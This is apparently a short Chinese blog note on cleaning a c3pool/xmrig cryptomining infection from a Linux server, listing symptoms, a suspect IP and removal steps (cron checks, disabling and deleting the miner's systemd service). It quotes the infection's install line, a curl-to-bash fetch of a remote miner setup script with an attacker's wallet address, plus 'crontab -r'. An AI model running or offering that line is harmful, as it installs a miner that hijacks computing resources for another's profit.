挖矿平台：猫池

病毒来源安装脚本

cat /root/c3pool/config.json

crontab -r
cd /root/c3pool

curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44SLpuV4U7gB6RNZMCweHxWug7b1YUir4jLr3RBaVX33QxjJdzzcMA2bvwo6P4i6AxZjzsh227W3SjodscE45xFD7iXuW12

旷池提供的卸载脚本

curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s

中毒现象

高cpu和高内存占用

kill -9 杀掉之后自动重启


进程ip：47.76.163.177 为美国IP，IP查询

查杀过程

查找病毒脚本位置find / -name xmrig

检查是否有相关的定时任务

crontab -l

如果有定时任务则删除掉

find / -name cron* -type d

查找自启动服务

因为kill -9杀掉进程之后会立即重启，需找到自启动服务，禁用后删除

systemctl list-units --type=service

find / -name c3pool_miner.service

找到所有相关的服务，全部删除

# 关闭自启动
systemctl disable c3pool_miner.service
# 停止服务
systemctl stop c3pool_miner.service
# 删除服务
rm -f /etc/systemd/system/c3pool_miner.service

最后将脚本文件删除

rm -rf /root/c3pool/

【安全】查杀linux上c3pool挖矿病毒xmrig
【安全】查杀linux挖矿病毒 kswapd0
【安全】查杀linux隐藏挖矿病毒rcu_tasked
【安全】挖矿木马自助清理手册